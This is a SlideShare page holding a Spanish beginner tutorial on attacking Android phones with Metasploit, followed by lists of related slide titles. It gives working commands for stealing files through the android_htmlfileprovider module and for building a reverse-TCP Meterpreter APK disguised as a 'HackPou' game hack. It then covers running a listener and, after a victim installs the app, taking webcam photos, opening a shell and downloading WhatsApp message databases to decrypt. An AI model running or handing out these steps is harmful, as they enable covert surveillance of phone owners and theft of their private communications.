SlideShare una empresa de Scribd logo
PENTEST & Support
Gathering en Android y Backdoor [Con Metasploit]
Por J0K3$/Icebreaker
Nivel de Paper = Básico
Gathering: Robo de Archivo en Android [Metasploit]
Hola!
En esta parte del paper explicaremos como conseguir información del Android,
primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno
una vez cargado usaremos el siguiente “Auxiliar” :
use auxiliary/gather/android_htmlfileprovider
Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno
ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso
os dejo acá una lista de los path de los directorios , para mi , interesantes.....
Bueno en mi casó no cogeré ninguna de esas cogeré, otras pues usare mi maquina
virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si
les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de
mi configuración y ahora les explicare punto por punto para que es cada.
Bueno, expliquemos esto por partes....
Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi
caso será hosts.
URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así
para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el
juego y saldria así : “Ip”/HackPou
SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la
dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les
extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al
ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo
HTTP]....
Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip ,
osease le daré esa ip haber que me muestra el exploit GO! .
Bueno, acá ven eso es la ip local , de el dispositivo atacado , y su versión de android
+ modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con
una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no?
….¿Tienen miedo?
Backdoor en Android. Tomando el Control del dispositivo.
[Metasploit]
Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma
sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan
tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la
acción primero dentro de la consola de metasploit colocaremos esto ….
search android
Bueno verán los siguientes módulos.....
O sí! Am sacado un exploit handler, y 2 payloads...mmm.... saquemos un APK
infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload ,
yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de
metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos
lo siguiente.....
sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o
Externa” R > “Ruta+Archivo.apk”
Ejemplo:
sudo msfpayload payload/android/meterpreter/reverse_tcp
LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk
Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué
pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a
msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin
formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden
comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien
escrito....Bueno una vez hecho eso, cargamos el exploit …...
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp
LHOST=”Su ip puesta en el backdoor” E
ejemplo:
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp
LHOST=”Su ip puesta en el backdoor” E
Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto....
O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para
ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
Uo! cuantos comandos! Probemos alguno como ...”Sysinfo”.....
Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una
foto con el teléfono infectado.....
No sé ve muy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y
como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos
shell....Esté es mi comando preferido....
O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard
haber que encontramos....
Oh! hemos encontrado el directorio de WhatsApp.....Salgamos y movamos con
meterpreter hacia este directorio para descargarnos algo....
Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2
comandos...
pwd = Es para ver en que directorio empezamos inicialmente....
cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “]
entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
la database llamado : “msgstore.db.crypt” , bueno ese archivo tiene las
conversaciones de whatsapp también podrían descargar imágenes...etc de todo ,
después de descargarlo usen algo como un whatsapp decripter y desencripten las
conversaciones para leerlas...ya are un paper de como se hacen ….
Saludos y que les allá servido de algo.
Gracias a Pentest And Support , especialmente gracias a David Urióstegui.

Más contenido relacionado

PDF
Proof of concept: Auditando sistema con METASPLOIT
PDF
Penetrar un servidor unix por el puerto 139 con metasploit
PDF
DOCX
Borrar tashes
PDF
Hack x crack_batch2
DOC
Mantenimeinto
DOCX
Doc trashes24214
DOC
librarse de un troyano (El libro del hacker capitulo 8)
Proof of concept: Auditando sistema con METASPLOIT
Penetrar un servidor unix por el puerto 139 con metasploit
Borrar tashes
Hack x crack_batch2
Mantenimeinto
Doc trashes24214
librarse de un troyano (El libro del hacker capitulo 8)

La actualidad más candente (12)

PPTX
Práctica de calculadora documentada
DOCX
Primero quiero que entiendas algo
PDF
Uso de Excepciones en JAVA
PDF
Manual de Lenguaje Batch
DOCX
Destructores
PPS
Problemas con el_ordenador
PPS
Computer Problems Ra
PPS
Computer Problems Ra
PPS
Problemas Con El Ordenador
PPS
PROBLEMAS CON EL PC
PPS
Problemas con el ordenador
Práctica de calculadora documentada
Primero quiero que entiendas algo
Uso de Excepciones en JAVA
Manual de Lenguaje Batch
Destructores
Problemas con el_ordenador
Computer Problems Ra
Computer Problems Ra
Problemas Con El Ordenador
PROBLEMAS CON EL PC
Problemas con el ordenador
Publicidad

Similar a Android (20)

PPTX
Troyanizando y Auditando Android - HoneyCON
PPTX
Comprometiendo dispositivos con software legal - H-C0N 2018
PPT
MAITAINING ACCESS
PDF
Seguridad: Backtrack2
PPT
Maitaining access
PPTX
Escaneo de Puertos
PDF
Taller Android Navaja Negra 5 ED
PPTX
Actualidad del malware en Android, detección y otros temas
PDF
Metasploit
PDF
Ataque win xp
PDF
Karmetasploit - Entorno de entrenamiento de seguridad informática
PDF
Pimp your Android. Rooted CON 2012.
PDF
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
PDF
Network.Penetration.CGSOL
PPTX
CPMX5 - Hacking like a boss por Roberto Salgado
PPTX
Presentation OWASP Day @ FIUBA.AR
PDF
Episodio de pentesting
PPTX
PDF
Penetración con una Backdoor
Troyanizando y Auditando Android - HoneyCON
Comprometiendo dispositivos con software legal - H-C0N 2018
MAITAINING ACCESS
Seguridad: Backtrack2
Maitaining access
Escaneo de Puertos
Taller Android Navaja Negra 5 ED
Actualidad del malware en Android, detección y otros temas
Metasploit
Ataque win xp
Karmetasploit - Entorno de entrenamiento de seguridad informática
Pimp your Android. Rooted CON 2012.
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
Network.Penetration.CGSOL
CPMX5 - Hacking like a boss por Roberto Salgado
Presentation OWASP Day @ FIUBA.AR
Episodio de pentesting
Penetración con una Backdoor
Publicidad

Último (20)

PDF
MÓDULO DE CALOR DE GRADO DE MEDIO DE FORMACIÓN PROFESIONAL
PPT
El-Gobierno-Electrónico-En-El-Estado-Bolivia
PDF
SAP Transportation Management para LSP, TM140 Col18
PDF
Calidad desde el Docente y la mejora continua .pdf
PPTX
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
PDF
clase auditoria informatica 2025.........
PDF
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN
PPTX
Power Point Nicolás Carrasco (disertación Roblox).pptx
PDF
Estrategia de apoyo tecnología miguel angel solis
PPTX
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
PPTX
Propuesta BKP servidores con Acronis1.pptx
PPTX
Sesion 1 de microsoft power point - Clase 1
PDF
Plantilla para Diseño de Narrativas Transmedia.pdf
PPT
Que son las redes de computadores y sus partes
PPTX
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
PDF
Diapositiva proyecto de vida, materia catedra
PPTX
REDES INFORMATICAS REDES INFORMATICAS.pptx
PPTX
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
PDF
CyberOps Associate - Cisco Networking Academy
PPTX
Presentación PASANTIAS AuditorioOO..pptx
MÓDULO DE CALOR DE GRADO DE MEDIO DE FORMACIÓN PROFESIONAL
El-Gobierno-Electrónico-En-El-Estado-Bolivia
SAP Transportation Management para LSP, TM140 Col18
Calidad desde el Docente y la mejora continua .pdf
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
clase auditoria informatica 2025.........
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN
Power Point Nicolás Carrasco (disertación Roblox).pptx
Estrategia de apoyo tecnología miguel angel solis
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
Propuesta BKP servidores con Acronis1.pptx
Sesion 1 de microsoft power point - Clase 1
Plantilla para Diseño de Narrativas Transmedia.pdf
Que son las redes de computadores y sus partes
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
Diapositiva proyecto de vida, materia catedra
REDES INFORMATICAS REDES INFORMATICAS.pptx
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
CyberOps Associate - Cisco Networking Academy
Presentación PASANTIAS AuditorioOO..pptx

Android

  • 1. PENTEST & Support Gathering en Android y Backdoor [Con Metasploit] Por J0K3$/Icebreaker Nivel de Paper = Básico Gathering: Robo de Archivo en Android [Metasploit] Hola! En esta parte del paper explicaremos como conseguir información del Android, primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno una vez cargado usaremos el siguiente “Auxiliar” : use auxiliary/gather/android_htmlfileprovider Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso os dejo acá una lista de los path de los directorios , para mi , interesantes.....
  • 2. Bueno en mi casó no cogeré ninguna de esas cogeré, otras pues usare mi maquina virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de mi configuración y ahora les explicare punto por punto para que es cada. Bueno, expliquemos esto por partes.... Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi caso será hosts. URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el juego y saldria así : “Ip”/HackPou SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo HTTP].... Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip , osease le daré esa ip haber que me muestra el exploit GO! .
  • 3. Bueno, acá ven eso es la ip local , de el dispositivo atacado , y su versión de android + modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no? ….¿Tienen miedo? Backdoor en Android. Tomando el Control del dispositivo. [Metasploit] Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la acción primero dentro de la consola de metasploit colocaremos esto …. search android Bueno verán los siguientes módulos.....
  • 4. O sí! Am sacado un exploit handler, y 2 payloads...mmm.... saquemos un APK infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload , yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos lo siguiente..... sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o Externa” R > “Ruta+Archivo.apk” Ejemplo: sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien escrito....Bueno una vez hecho eso, cargamos el exploit …... sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E ejemplo: sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E
  • 5. Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
  • 6. Uo! cuantos comandos! Probemos alguno como ...”Sysinfo”..... Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una foto con el teléfono infectado.....
  • 7. No sé ve muy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos shell....Esté es mi comando preferido.... O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard haber que encontramos....
  • 8. Oh! hemos encontrado el directorio de WhatsApp.....Salgamos y movamos con meterpreter hacia este directorio para descargarnos algo.... Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2 comandos... pwd = Es para ver en que directorio empezamos inicialmente.... cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “] entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
  • 9. la database llamado : “msgstore.db.crypt” , bueno ese archivo tiene las conversaciones de whatsapp también podrían descargar imágenes...etc de todo , después de descargarlo usen algo como un whatsapp decripter y desencripten las conversaciones para leerlas...ya are un paper de como se hacen …. Saludos y que les allá servido de algo. Gracias a Pentest And Support , especialmente gracias a David Urióstegui.